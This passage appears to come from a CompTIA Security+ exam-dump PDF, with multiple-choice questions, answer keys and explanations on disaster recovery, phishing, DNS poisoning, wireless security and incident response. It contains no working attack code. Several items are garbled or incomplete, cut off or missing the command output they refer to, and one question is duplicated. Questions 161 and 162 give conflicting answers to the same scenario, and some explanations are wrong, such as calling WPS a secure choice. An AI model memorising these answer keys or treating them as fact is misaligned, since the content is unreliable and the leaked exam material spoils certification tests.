B. Parallel
C. Full interruption
D. Simulation
Answer: A
Explanation:
A tabletop exercise is a type of disaster recovery test that simulates a disaster scenario in a discussion-
based format, without actually disrupting operations or requiring physical testing of recovery procedures.
It is the least time-consuming type of test for the disaster recovery team.
116.Which of the following BEST describes a technique that compensates researchers for finding
vulnerabilities?
A. Penetration testing
B. Code review
C. Wardriving
D. Bug bounty
Answer: D
Explanation:
A bug bounty is a technique that compensates researchers for finding vulnerabilities in software or
systems. A bug bounty program is an initiative that offers rewards, usually monetary, to ethical hackers
who report security flaws to the owners or developers of the software or system. Bug bounty programs
are often used by companies such as Meta (formerly Facebook), Google, Microsoft, and others to
improve the security of their products and services
Bug bounty programs compensate researchers, often financially, for finding vulnerabilities in software,
websites, or other technology. These programs provide an additional layer of security testing and
incentivize researchers to report vulnerabilities instead of exploiting them.
117.A security administrator has discovered that workstations on the LAN are becoming infected with
malware. The cause of the infections appears to be users receiving phishing emails that are bypassing
the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs,
as no internal controls currently exist in the environment to evaluate their safety.
Which of the following would be BEST to implement to address the issue?
A. Forward proxy
B. HIDS
C. Awareness training
D. A jump server
E. IPS
47 / 142
The safer , easier way to help you pass any IT exams.
Answer: C
Explanation:
Awareness training should be implemented to educate users on the risks of clicking on malicious URLs.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 9
118.A security researcher has alerted an organization that its sensitive user data was found for sale on a
website.
Which of the following should the organization use to inform the affected parties?
A. A An incident response plan
B. A communications plan
C. A business continuity plan
D. A disaster recovery plan
Answer: B
Explanation:
The organization should use a communications plan to inform the affected parties. A communications
plan is a document that outlines how an organization will communicate with internal and external
stakeholders during a crisis or incident. It should include details such as who will be responsible for
communicating with different stakeholders, what channels will be used to communicate, and what
messages will be communicated.
An incident response plan is a document that outlines the steps an organization will take to respond to a
security incident or data breach. A business continuity plan is a document that outlines how an
organization will continue to operate during and after a disruption. A disaster recovery plan is a document
that outlines how an organization will recover its IT infrastructure and data after a disaster.
119.Which of the following isa risk that is specifically associated with hesting applications iin the public
cloud?
A. Unsecured root accounts
B. Zero day
C. Shared tenancy
D. Insider threat
Answer: C
Explanation:
When hosting applications in the public cloud, there is a risk of shared tenancy, meaning that multiple
organizations are sharing the same infrastructure. This can potentially allow one tenant to access
another tenant's data, creating a security risk.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
120.CORRECT TEXT
After a hardware incident, an unplanned emergency maintenance activity was conducted to rectify the
issue. Multiple alerts were generated on the SIEM during this period of time.
Which of the following BEST explains what happened?
A The unexpected traffic correlated against multiple rules, generating multiple alerts.
B. Multiple alerts were generated due to an attack occurring at the same time.
C. An error in the correlation rules triggered multiple alerts.
48 / 142
The safer , easier way to help you pass any IT exams.
D. The SIEM was unable to correlate the rules, triggering the alerts.
Answer: A
Explanation:
Multiple alerts were generated on the SIEM during the emergency maintenance activity due to
unexpected traffic correlated against multiple rules. The SIEM generates alerts when it detects an event
that matches a rule in its rulebase. If the event matches multiple rules, the SIEM will generate multiple
alerts.
121.As part of a company's ongoing SOC maturation process, the company wants to implement a
method to share cyberthreat intelligence data with outside security partners.
Which of the following will the company MOST likely implement?
A. TAXII
B. TLP
C. TTP
D. STIX
Answer: A
Explanation:
Trusted Automated Exchange of Intelligence Information (TAXII) is a standard protocol that enables the
sharing of cyber threat intelligence between organizations. It allows organizations to automate the
exchange of information in a secure and timely manner.
References: CompTIA Security+ Certification Exam Objectives - 3.6 Given a scenario, implement secure
network architecture concepts. Study Guide: Chapter 4, page 167.
122.A network analyst is setting up a wireless access point for a home office in a remote, rural location.
The requirement is that users need to connect to the access point securely but do not want to have to
remember passwords.
Which of the following should the network analyst enable to meet the requirement?
A. MAC address filtering
B. 802.1X
C. Captive portal
D. WPS
Answer: D
Explanation:
The network analyst should enable Wi-Fi Protected Setup (WPS) to allow users to connect to the
wireless access point securely without having to remember passwords. WPS allows users to connect to
a wireless network by pressing a button or entering a PIN instead of entering a password.
Reference: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 4: Identity and Access
Management
123.A security analyst is investigating a phishing email that contains a malicious document directed to
the company's Chief Executive Officer (CEO).
Which of the following should the analyst perform to understand the threat and retrieve possible IoCs?
A. Run a vulnerability scan against the CEOs computer to find possible vulnerabilities
B. Install a sandbox to run the malicious payload in a safe environment
49 / 142
The safer , easier way to help you pass any IT exams.
124.A security researcher has alerted an organization that its sensitive user data was found for sale on a
website.
Which of the following should the organization use to inform the affected parties?
A. An incident response plan
B. A communications plan
C. A business continuity plan
D. A disaster recovery plan
Answer: B
Explanation:
A communications plan should be used to inform the affected parties about the sale of sensitive user
data on a website. The communications plan should detail how the organization will handle media
inquiries, how to communicate with customers, and how to respond to other interested parties.
125.Which of the following BEST describes the method a security analyst would use to confirm a file that
is downloaded from a trusted security website is not altered in transit or corrupted using a verified
checksum?
A. Hashing
B. Salting
C. Integrity
D. Digital signature
Answer: A
Explanation:
Hashing is a cryptographic function that produces a unique fixed-size output (i.e., hash value) from an
input (i.e., data). The hash value is a digital fingerprint of the data, which means that if the data changes,
so too does the hash value. By comparing the hash value of the downloaded file with the hash value
provided by the security website, the security analyst can verify that the file has not been altered in
transit or corrupted.
126.If a current private key is compromised, which of the following would ensure it cannot be used to
decrypt ail historical data?
A. Perfect forward secrecy
B. Elliptic-curve cryptography
C. Key stretching
D. Homomorphic encryption
50 / 142
The safer , easier way to help you pass any IT exams.
Answer: A
Explanation:
Perfect forward secrecy would ensure that it cannot be used to decrypt all historical data. Perfect forward
secrecy (PFS) is a security protocol that generates a unique session key for each session between two
parties. This ensures that even if one session key is compromised, it cannot be used to decrypt other
sessions.
127.A company is implementing a new SIEM to log and send alerts whenever malicious activity is
blocked by its antivirus and web content filters.
Which of the following is the primary use case for this scenario?
A. Implementation of preventive controls
B. Implementation of detective controls
C. Implementation of deterrent controls
D. Implementation of corrective controls
Answer: B
Explanation:
A Security Information and Event Management (SIEM) system is a tool that collects and analyzes
security-related data from various sources to detect and respond to security incidents. References:
CompTIA Security+ Study Guide 601, Chapter 5
128.After segmenting the network, the network manager wants to control the traffic between the
segments.
Which of the following should the manager use to control the network traffic?
A. A DMZ
B. A VPN a
C. A VLAN
D. An ACL
Answer: D
Explanation:
After segmenting the network, a network manager can use an access control list (ACL) to control the
traffic between the segments. An ACL is a set of rules that permit or deny traffic based on its
characteristics, such as the source and destination IP addresses, protocol type, and port number.
References: CompTIA Security+ Certification Guide, Exam SY0-501
129.The help desk has received calls from users in multiple locations who are unable to access core
network services. The network team has identified and turned off the network switches using remote
commands.
Which of the following actions should the network team take NEXT?
A. Disconnect all external network connections from the firewall
B. Send response teams to the network switch locations to perform updates
C. Turn on all the network switches by using the centralized management software
D. Initiate the organization's incident response plan.
Answer: D
Explanation:
51 / 142
The safer , easier way to help you pass any IT exams.
An incident response plan is a set of procedures and guidelines that defines how an organization should
respond to a security incident. An incident response plan typically includes the following phases:
preparation, identification, containment, eradication, recovery, and lessons learned.
If the help desk has received calls from users in multiple locations who are unable to access core
network services, it could indicate that a network outage or a denial-of-service attack has occurred. The
network team has identified and turned off the network switches using remote commands, which could
be a containment measure to isolate the affected devices and prevent further damage.
The next action that the network team should take is to initiate the organization’s incident
response plan, which would involve notifying the appropriate stakeholders, such as
management, security team, legal team, etc., and following the predefined steps to
investigate, analyze, document, and resolve the incident.
The other options are not correct because:
✑ A. Disconnect all external network connections from the firewall. This could be another containment
measure to prevent external attackers from accessing the network, but it would also disrupt legitimate
network traffic and services. This action should be taken only if it is part of the incident response plan
and after notifying the relevant parties.
✑ B. Send response teams to the network switch locations to perform updates. This could be a recovery
measure to restore normal network operations and apply patches or updates to prevent future incidents,
but it should be done only after the incident has been properly identified, contained, and eradicated.
✑ C. Turn on all the network switches by using the centralized management software. This could be a
recovery measure to restore normal network operations, but it should be done only after the incident has
been properly identified, contained, and eradicated.
According to CompTIA Security+ SY0-601 Exam Objectives 1.5 Given a scenario, analyze indicators of
compromise and determine the type of malware:
“An incident response plan is a set of procedures and guidelines that defines how an organization should
respond to a security incident. An incident response plan typically includes the following phases:
preparation, identification, containment, eradication, recovery, and lessons learned.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
130.A company acquired several other small companies The company thai acquired the others
is transitioning network services to the cloud The company wants to make sure that performance and
security remain intact.
Which of the following BEST meets both requirements?
A. High availability
B. Application security
C. Segmentation
D. Integration and auditing
Answer: A
Explanation:
High availability refers to the ability of a system or service to remain operational and available to users
with minimal downtime. By ensuring high availability, the company can maintain good performance and
ensure that users have access to the network services they need. High availability can also improve
52 / 142
The safer , easier way to help you pass any IT exams.
security, as it helps to prevent disruptions that could potentially be caused by security incidents or other
issues.
131.An analyst Is generating a security report for the management team. Security guidelines recommend
disabling all listening unencrypted services.
Given this output from Nmap:
132.A security team suspects that the cause of recent power consumption overloads is the unauthorized
use of empty power outlets in the network rack.
Which of the following options will mitigate this issue without compromising the number of outlets
available?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity
Answer: B
Explanation:
A managed Power Distribution Unit (PDU) allows you to monitor and control power outlets on the rack.
This will allow the security team to identify which devices are drawing power and from which outlets,
which can help to identify any unauthorized devices. Moreover, with a managed PDU, you can also
control the power to outlets, turn off outlets that are not in use, and set up alerts if an outlet is
overloaded. This will help to mitigate the issue of power consumption overloads without compromising
the number of outlets available.
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
133.A Chief Information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares.
Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
53 / 142
The safer , easier way to help you pass any IT exams.
Answer: A
Explanation:
The company should implement Data Loss Prevention (DLP) to prevent employees from stealing data.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 8
134.Which of the following BEST describes a social-engineering attack that relies on an executive at a
small business visiting a fake banking website where credit card and account details are harvested?
A. Whaling
B. Spam
C. Invoice scam
D. Pharming
Answer: A
Explanation:
A social engineering attack that relies on an executive at a small business visiting a fake banking website
where credit card and account details are harvested is known as whaling. Whaling is a type of phishing
attack that targets high-profile individuals, such as executives, to steal sensitive information or gain
access to their accounts.
135.Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code
in a software company’s final software releases? (Select TWO.)
A. Unsecure protocols
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software
Answer: D,E
Explanation:
The most likely vectors for the unauthorized inclusion of vulnerable code in a software company's final
software releases are included third-party libraries and vendors/supply chain. References: CompTIA
Security+ Study Guide by Emmett Dulaney, Chapter 8: Application, Data, and Host Security, Supply
Chain and Software Development Life Cycle
136.A user attempts to load a web-based application, but the expected login screen does not appear A
help desk analyst troubleshoots the issue by running the following command and reviewing the output on
the user's PC
The help desk analyst then runs the same command on the local PC
54 / 142
The safer , easier way to help you pass any IT exams.
Which of the following BEST describes the attack that is being detected?
A. Domain hijacking
B DNS poisoning
C MAC flooding
B. Evil twin
Answer: B
Explanation:
DNS poisoning, also known as DNS spoofing or DNS cache poisoning, is a form of computer security
hacking in which corrupt Domain Name System (DNS) data is introduced into the DNS resolver’s cache,
causing the name server to return an incorrect result record, such as an IP address. This results in traffic
being diverted to the attacker’s computer (or any other malicious destination).
DNS poisoning can be performed by various methods, such as:
✑ Intercepting and forging DNS responses from legitimate servers
✑ Compromising DNS servers and altering their records
✑ Exploiting vulnerabilities in DNS protocols or implementations
✑ Sending malicious emails or links that trigger DNS queries with poisoned responses
According to CompTIA Security+ SY0-601 Exam Objectives 1.4 Given a scenario, analyze potential
indicators to determine the type of attack:
“DNS poisoning, also known as DNS spoofing or DNS cache poisoning, is a form of computer security
hacking in which corrupt Domain Name System (DNS) data is introduced into the DNS resolver’s cache,
causing the name server to return an incorrect result record.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cloudflare.com/learning/dns/dns-cache-poisoning/
137.The spread of misinformation surrounding the outbreak of a novel virus on election day led to
eligible voters choosing not to take the risk of going the polls.
This is an example of:
A. prepending.
B. an influence campaign.
C. a watering-hole attack.
D. intimidation.
E. information elicitation.
Answer: B
Explanation:
This scenario describes an influence campaign, where false information is spread to influence or
manipulate people's beliefs or actions. In this case, the misinformation led eligible voters to avoid polling
places, which influenced the outcome of the election.
55 / 142
The safer , easier way to help you pass any IT exams.
138.A grocery store is expressing security and reliability concerns regarding the on-site backup strategy
currently being performed by locally attached disks. The main concerns are the physical security of the
backup media and the durability of the data stored on these devices.
Which of the following is a cost-effective approach to address these concerns?
A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off-site
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution
Answer: D
Explanation:
a backup strategy is a plan that defines how to protect data from loss or corruption by creating and
storing copies of data on a different medium or location1. A backup strategy should consider the security
and reliability of the backup data and the backup storage234.
Based on these definitions, the best option that is a cost-effective approach to address the security and
reliability concerns regarding the on-site backup strategy would be D. Migrate to a cloud backup
solution24.
A cloud backup solution can provide several benefits, such as:
✑ Enhanced physical security of the backup data by storing it in a remote location that is protected by
multiple layers of security measures.
✑ Enhanced durability of the backup data by storing it on highly reliable storage devices that are
replicated across multiple availability zones or regions.
✑ Reduced costs of backup storage by paying only for the amount of data stored and transferred, and
by using features such as compression, deduplication, encryption, and lifecycle management.
✑ Increased flexibility and scalability of backup storage by choosing from various storage classes and
tiers that match the performance and availability requirements of the backup data.
139.A dynamic application vulnerability scan identified code injection could be performed using a web
form.
Which of the following will be BEST remediation to prevent this vulnerability?
A. Implement input validations
B. Deploy MFA
C. Utilize a WAF
D. Configure HIPS
Answer: A
Explanation:
Implementing input validations will prevent code injection attacks by verifying the type and format of user
input. References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 8
140.A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when
writing documents and the mouse pointer occasional disappears.
The task list shows the following results
56 / 142
The safer , easier way to help you pass any IT exams.
141.An application owner reports suspicious activity on an internal financial application from various
internal users within the past 14 days.
A security analyst notices the following:
• Financial transactions were occurring during irregular time frames and outside of business hours by
unauthorized users.
• Internal users in question were changing their passwords frequently during that time period.
• A jump box that several domain administrator users use to connect to remote devices was recently
compromised.
• The authentication method used in the environment is NTLM.
Which of the following types of attacks is MOST likely being used to gain unauthorized access?
A. Pass-the-hash
B. Brute-force
C. Directory traversal
D. Replay
Answer: A
Explanation:
The suspicious activity reported by the application owner, combined with the recent compromise of the
jump box and the use of NTLM authentication, suggests that an attacker is likely using a pass-the-hash
attack to gain unauthorized access to the financial application. This type of attack involves stealing
hashed passwords from memory and then using them to authenticate as the compromised user without
needing to know the user's plaintext password.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 5
57 / 142
The safer , easier way to help you pass any IT exams.
142.Which of the following roles would MOST likely have direct access to the senior management team?
A. Data custodian
B. Data owner
C. Data protection officer
D. Data controller
Answer: C
Explanation:
A data protection officer (DPO) is a role that oversees the data protection strategy and compliance of an
organization. A DPO is responsible for ensuring that the organization follows data protection laws and
regulations, such as the General Data Protection Regulation (GDPR), and protects the privacy rights of
data subjects. A DPO also acts as a liaison between the organization and data protection authorities, as
well as data subjects and other stakeholders.
A DPO would most likely have direct access to the senior management team, as they need to report on
data protection issues, risks, and incidents, and advise on data protection policies and practices.
The other options are not correct because:
✑ A. Data custodian is a role that implements and maintains the technical controls and procedures for
data security and integrity. A data custodian does not have direct access to the senior management
team, as they are more involved in operational tasks than strategic decisions.
✑ B. Data owner is a role that determines the classification and usage of data within an organization. A
data owner does not have direct access to the senior management team, as they are more involved in
business functions than data protection compliance.
✑ D. Data controller is a role that determines the purposes and means of processing personal data
within an organization. A data controller does not have direct access to the senior management team, as
they are more involved in data processing activities than data protection oversight.
According to CompTIA Security+ SY0-601 Exam Objectives 2.3 Given a scenario, implement secure
protocols:
“A data protection officer (DPO) is a role that oversees the data protection strategy and compliance of an
organization.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://gdpr-info.eu/issues/data-protection-officer/
143.A security researcher is tracking an adversary by noting its attacks and techniques based
on its capabilities, infrastructure, and victims.
Which of the following is the researcher MOST likely using?
A. The Diamond Model of Intrusion Analysis
B. The Cyber Kill Chain
C. The MITRE CVE database
D. The incident response process
Answer: A
Explanation:
The Diamond Model is a framework for analyzing cyber threats that focuses on four key elements:
58 / 142
The safer , easier way to help you pass any IT exams.
adversary, capability, infrastructure, and victim. By analyzing these elements, security researchers can
gain a better understanding of the threat landscape and develop more effective security strategies.
144.Remote workers in an organization use company-provided laptops with locally installed applications
and locally stored data Users can store data on a remote server using an encrypted connection. The
organization discovered data stored on a laptop had been made available to the public.
Which of the following security solutions would mitigate the risk of future data disclosures?
A. FDE
B. TPM
C. HIDS
D. VPN
Answer: A
Explanation:
Based on these definitions, the best security solution to mitigate the risk of future data disclosures from a
laptop would be FDE123. FDE would prevent unauthorized access to the data stored on the laptop even
if it is stolen or lost. FDE can also use TPM to store the encryption key and ensure that only trusted
software can decrypt the data3. HIDS and VPN are not directly related to data encryption, but they can
provide additional security benefits by detecting intrusions and protecting network traffic respectively.
145.An analyst is working on an email security incident in which the target opened an attachment
containing a worm. The analyst wants to implement mitigation techniques to prevent further spread.
Which of the following is the BEST course of action for the analyst to take?
A. Apply a DLP solution.
B. Implement network segmentation
C. Utilize email content filtering,
D. isolate the infected attachment.
Answer: B
Explanation:
Network segmentation is the BEST course of action for the analyst to take to prevent further spread of
the worm. Network segmentation helps to divide a network into smaller segments, isolating the infected
attachment from the rest of the network. This helps to prevent the worm from spreading to other devices
within the network. Implementing email content filtering or DLP solution might help in preventing the
email from reaching the target or identifying the worm, respectively, but will not stop the spread of the
worm.
References: CompTIA Security+ Study Guide, Chapter 5: Securing Network Infrastructure, 5.2
Implement Network Segmentation, pp. 286-289
146.Which of the following is a physical security control that ensures only the authorized user is present
when gaining access to a secured area?
A. A biometric scanner
B. A smart card reader
C. APKItoken
D. A PIN pad
Answer: A
59 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
A biometric scanner uses physical characteristics such as fingerprints to identify an individual user. It is
used to ensure that only the authorized user is present when gaining access to a secured area.
147.During an incident, a company's CIRT determines it is necessary to observe the continued network-
based transactions between a callback domain and the malware running on an enterprise PC.
Which of the following techniques would be BEST to enable this activity while reducing the nsk of lateral
spread and the risk that the adversary would notice any changes?
A. Physically move the PC to a separate Internet point of presence.
B. Create and apply microsegmentation rules,
C. Emulate the malware in a heavily monitored DMZ segment
D. Apply network blacklisting rules for the adversary domain
Answer: C
Explanation:
Emulating the malware in a heavily monitored DMZ segment is the best option for observing network-
based transactions between a callback domain and the malware running on an enterprise PC. This
approach provides an isolated environment for the malware to run, reducing the risk of lateral spread
and detection by the adversary. Additionally, the DMZ can be monitored closely to gather intelligence on
the adversary's tactics and techniques. References: CompTIA Security+ Study Guide, page 129
148.A security analyst wants to verify that a client-server (non-web) application is sending encrypted
traffic.
Which of the following should the analyst use?
A. openssl
B. hping
C. netcat
D. tcpdump
Answer: A
Explanation:
To verify that a client-server (non-web) application is sending encrypted traffic, a security analyst can use
OpenSSL. OpenSSL is a software library that provides cryptographic functions, including encryption and
decryption, in support of various security protocols, including SSL/TLS. It can be used to check whether
a client-server application is using encryption to protect traffic.
References: ✑ CompTIA Security+ Certification Exam Objectives - Exam SY0-601
149.A security analyst has been tasked with creating a new WiFi network for the company.
The requirements received by the analyst are as follows:
• Must be able to differentiate between users connected to WiFi
• The encryption keys need to change routinely without interrupting the users or forcing reauthentication
• Must be able to integrate with RADIUS
• Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?
A. WPA2-Enterprise
B. WPA3-PSK
60 / 142
The safer , easier way to help you pass any IT exams.
C. 802.11n
D. WPS
Answer: A
Explanation:
WPA2-Enterprise can accommodate all of the requirements listed. WPA2-Enterprise uses 802.1X
authentication to differentiate between users, supports the use of RADIUS for authentication, and allows
for the use of dynamic encryption keys that can be changed without disrupting the users or requiring
reauthentication. Additionally, WPA2-Enterprise does not allow for open SSIDs.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 7: Securing Networks, p. 317
150.An employee received multiple messages on a mobile device. The messages instructing the
employee to pair the device to an unknown device.
Which of the following BEST describes What a malicious person might be doing to cause this issue to
occur?
A. Jamming
B. Bluesnarfing
C. Evil twin
D. Rogue access point
Answer: B
Explanation:
Bluesnarfing is a hacking technique that exploits Bluetooth connections to snatch data from a wireless
device. An attacker can perform bluesnarfing when the Bluetooth function is on and your device is
discoverable by other devices within range. In some cases, attackers can even make calls from their
victim’s phone1.
151.Certain users are reporting their accounts are being used to send unauthorized emails and conduct
suspicious activities.
After further investigation, a security analyst notices the following:
• All users share workstations throughout the day.
• Endpoint protection was disabled on several workstations throughout the network.
• Travel times on logins from the affected users are impossible.
• Sensitive data is being uploaded to external sites.
• All user account passwords were forced to be reset and the issue continued.
Which of the following attacks is being used to compromise the user accounts?
A. Brute-force
B. Keylogger
C. Dictionary
D. Rainbow
Answer: B
Explanation:
The symptoms suggest a keylogger is being used to compromise the user accounts, allowing the
attackers to obtain the users' passwords and other sensitive information.
References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 6
61 / 142
The safer , easier way to help you pass any IT exams.
152.Which of the following authentication methods sends out a unique password to be used within a
specific number of seconds?
A. TOTP
B. Biometrics
C. Kerberos
D. LDAP
Answer: A
Explanation:
Time-based One-Time Password (TOTP) is a type of authentication method that sends out a unique
password to be used within a specific number of seconds. It uses a combination of a shared secret key
and the current time to generate a one-time password. TOTP is commonly used for two-factor
authentication (2FA) to provide an additional layer of security beyond just a username and password.
153.A security analyst is reviewing the vulnerability scan report for a web server following an incident.
The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and
a patch is available for the vulnerability.
Which of the following is the MOST likely cause?
A. Security patches were uninstalled due to user impact.
B. An adversary altered the vulnerability scan reports
C. A zero-day vulnerability was used to exploit the web server
D. The scan reported a false negative for the vulnerability
Answer: A
Explanation:
A security patch is a software update that fixes a vulnerability or bug that could be exploited by attackers.
Security patches are essential for maintaining the security and functionality of systems and applications.
If the vulnerability that was used to exploit the server is present in historical vulnerability scan reports,
and a patch is available for the vulnerability, it means that the patch was either not applied or was
uninstalled at some point. A possible reason for uninstalling a security patch could be user impact, such
as performance degradation, compatibility issues, or functionality loss.
The other options are not correct because:
✑ B. An adversary altered the vulnerability scan reports. This could be a possibility, but it is less likely
than option A. An adversary would need to have access to the vulnerability scan reports and be able to
modify them without being detected.
Moreover, altering the reports would not prevent the patch from being applied or uninstalled.
✑ C. A zero-day vulnerability was used to exploit the web server. This is not correct because a zero-day
vulnerability is a vulnerability that is unknown to the public or the vendor, and therefore has no patch
available. The question states that a patch is available for the vulnerability that was used to exploit the
server.
✑ D. The scan reported a false negative for the vulnerability. This is not correct because a false negative
is when a scan fails to detect a vulnerability that is present. The question states that the vulnerability is
present in historical vulnerability scan reports, which means that it was detected by previous scans.
According to CompTIA Security+ SY0-601 Exam Objectives 1.4 Given a scenario, analyze potential
indicators to determine the type of attack:
“A security patch is a software update that fixes a vulnerability or bug that could be exploited by
62 / 142
The safer , easier way to help you pass any IT exams.
attackers.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.getastra.com/blog/security-audit/vulnerability-scanning-report/
154.A company is concerned about individuals dnvmg a car into the building to gam access.
Which of the following security controls would work BEST to prevent this from happening?
A. Bollard
B. Camera
C. Alarms
D. Signage
E. Access control vestibule
Answer: A
Explanation:
A bollard would work best to prevent individuals from driving a car into the building. A bollard is a short,
vertical post that can be used to block vehicles from entering a designated area. It is specifically
designed to stop cars from crashing into buildings or other structures.
155.Developers are writing code and merging it into shared repositories several times a day, where it is
tested automatically.
Which of the following concepts does this BEST represent?
A. Functional testing
B. Stored procedures
C. Elasticity
D. Continuous integration
Answer: D
Explanation:
Continuous integration is a software development practice where developers merge their code into a
shared repository several times a day, and the code is tested automatically. This ensures that code
changes are tested and integrated continuously, reducing the risk of errors and conflicts.
156.A security architect is implementing a new email architecture for a company. Due to security
concerns, the Chief Information Security Officer would like the new architecture to support email
encryption, as well as provide for digital signatures.
Which of the following should the architect implement?
A. TOP
B. IMAP
C. HTTPS
D. S/MIME
Answer: D
Explanation:
S/MIME (Secure/Multipurpose Internet Mail Extensions) is a protocol that enables secure email
messages to be sent and received. It provides email encryption, as well as digital signatures, which can
63 / 142
The safer , easier way to help you pass any IT exams.
be used to verify the authenticity of the sender. S/MIME can be used with a variety of email protocols,
including POP and IMAP.
References:
✑ https://www.comptia.org/content/guides/what-is-smime
✑ CompTIA Security+ Study Guide, Sixth Edition (SY0-601), page 139
157.A security analyst notices several attacks are being blocked by the NIPS but does not see anything
on the boundary firewall logs. The attack seems to have been thwarted.
Which of the following resiliency techniques was applied to the network to prevent this attack?
A. NIC Teaming
B. Port mirroring
C. Defense in depth
D. High availability
E. Geographic dispersal
Answer: C
Explanation:
Defense in depth is a resiliency technique that involves implementing multiple layers of security controls
to protect against different types of threats. In this scenario, the NIPS likely provided protection at a
different layer than the boundary firewall, demonstrating the effectiveness of defense in depth.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
159.Which of the following would MOST likely be identified by a credentialed scan but would be missed
by an uncredentialed scan?
A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.
Answer: D
Explanation:
An uncredentialed scan would miss missing patches for third-party software on Windows workstations
and servers. A credentialed scan, however, can scan the registry and file system to determine the patch
level of third-party applications. References: CompTIA Security+ Study Guide by Emmett Dulaney,
64 / 142
The safer , easier way to help you pass any IT exams.
160.Which of the following in a forensic investigation should be priorities based on the order of volatility?
(Select TWO).
A. Page files
B. Event logs
C. RAM
D. Cache
E. Stored files
F. HDD
Answer: C,D
Explanation:
In a forensic investigation, volatile data should be collected first, based on the order of volatility. RAM
and Cache are examples of volatile data. References: CompTIA Security+ Study Guide 601, Chapter 11
161.A company recently experienced an attack during which its main website was Directed to the
attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers,.
Which of the following should the company implement to prevent this type of attack from occurring In the
future?
A. IPsec
B. SSL/TLS
C. ONSSEC
D. SMIME
Answer: B
Explanation:
To prevent attacks where the main website is directed to the attacker's web server and allowing the
attacker to harvest credentials from unsuspecting customers, the company should implement SSL/TLS
(Secure Sockets Layer/Transport Layer Security) to encrypt the communication between the web server
and the clients. This will prevent attackers from intercepting and tampering with the communication, and
will also help to verify the identity of the web server to the clients.
162.A company recently experienced an attack during which 5 main website was directed to the atack-
er’s web server, allowing the attacker to harvest credentials from unsuspecting customers.
Which of the following should the company Implement to prevent this type of attack from occurring in the
future?
A. IPSec
B. SSL/TLS
C. DNSSEC
D. S/MIME
Answer: C
Explanation:
The attack described in the question is known as a DNS hijacking attack. In this type of attack, an
attacker modifies the DNS records of a domain name to redirect traffic to their own server. This allows
them to intercept traffic and steal sensitive information such as user credentials.
65 / 142
The safer , easier way to help you pass any IT exams.
To prevent this type of attack from occurring in the future, the company should implement C. DNSSEC.
DNSSEC (Domain Name System Security Extensions) is a security protocol that adds digital signatures
to DNS records. This ensures that DNS records are not modified during transit and prevents DNS
hijacking attacks.
163.A security analyst is responding to an alert from the SIEM. The alert states that malware was
discovered on a host and was not automatically deleted.
Which of the following would be BEST for the analyst to perform?
A. Add a deny-all rule to that host in the network ACL
B. Implement a network-wide scan for other instances of the malware.
C. Quarantine the host from other parts of the network
D. Revoke the client's network access certificates
Answer: C
Explanation:
When malware is discovered on a host, the best course of action is to quarantine the host from other
parts of the network. This prevents the malware from spreading and potentially infecting other hosts.
Adding a deny-all rule to the host in the network ACL may prevent legitimate traffic from being
processed, implementing a network-wide scan is time-consuming and may not be necessary, and
revoking the client's network access certificates is an extreme measure that may not be warranted.
References: CompTIA Security+ Study Guide, pages 113-114
164.A company recently decided to allow its employees to use their personally owned devices for tasks
like checking email and messaging via mobile applications. The company would like to use MDM, but
employees are concerned about the loss of personal data.
Which of the following should the IT department implement to BEST protect the company against
company data loss while still addressing the employees’ concerns?
A. Enable the remote-wiping option in the MDM software in case the phone is stolen.
B. Configure the MDM software to enforce the use of PINs to access the phone.
C. Configure MDM for FDE without enabling the lock screen.
D. Perform a factory reset on the phone before installing the company's applications.
Answer: C
Explanation:
MDM software is a type of remote asset-management software that runs from a central server. It is used
by businesses to optimize the functionality and security of their mobile devices, including smartphones
and tablets. It can monitor and regulate both corporate-owned and personally owned devices to the
organization’s policies.
FDE stands for full disk encryption, which is a method of encrypting all data on a device’s storage. FDE
can protect data from unauthorized access in case the device is lost or stolen.
If a company decides to allow its employees to use their personally owned devices for work tasks, it
should configure MDM software to enforce FDE on those devices. This way, the company can protect its
data from being exposed if the device falls into the wrong hands. However, employees may be
concerned about the loss of personal data if the company also enables the remote-wiping option in the
MDM software. Remote wiping is a feature that allows the company to erase all data on a device
remotely in case of theft or loss. Remote wiping can also affect personal data on the device, which may
66 / 142
The safer , easier way to help you pass any IT exams.
165.A customer has reported that an organization's website displayed an image of a smiley (ace rather
than the expected web page for a short time two days earlier.
A security analyst reviews log tries and sees the following around the lime of the incident:
67 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
The log entry shows the IP address for "www.example.com" being changed to a different IP address,
which is likely the result of DNS poisoning. DNS poisoning occurs when an attacker is able to change the
